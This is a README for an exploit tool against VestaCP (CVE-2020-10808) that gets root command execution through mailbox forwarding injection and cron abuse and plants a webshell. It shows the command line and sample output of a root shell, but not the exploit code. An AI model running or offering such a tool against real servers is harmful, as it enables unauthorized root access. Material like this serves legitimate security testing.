CVE: CVE-2020-10808
Based on: rekter0/vestaROOT
Advisory: SSD Disclosure - VestaCP Multiple Vulnerabilities
This exploit targets multiple vulnerabilities in Vesta Control Panel (VestaCP) that allow an authenticated user to achieve root-level command execution through mailbox forwarding injection and cron job abuse.
- Authenticated RCE to root privileges
- Automatic webshell deployment (
ownwebshell.php) - Interactive command execution loop
- Standalone implementation - no external dependencies
- Automatic domain and mailbox creation
python3 vesta-rce-exploit.py https://<target>:8083 <username> <password>Note: Use HTTPS protocol for port 8083 connections.
$ python3 vesta-rce-exploit.py https://192.168.1.100:8083 admin password123
[INFO] Attempting login to https://192.168.1.100:8083 as admin
[+] Logged in as admin
[INFO] Checking for existing webshell or creating one
[+] Webshell uploaded
[INFO] Creating mailbox on domain abc123.poc
[+] Mail account created
[INFO] Deploying backdoor via mailbox editing
[+] Root shell possibly obtained. Enter commands:
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit- Valid user credentials for VestaCP
- Python 3.x
- Target running VestaCP ≤ 0.9.8-26
This tool is provided for educational purposes and authorized security testing only. Unauthorized access to systems you do not own or have explicit permission to test is illegal and unethical. Use responsibly and in compliance with applicable laws and regulations.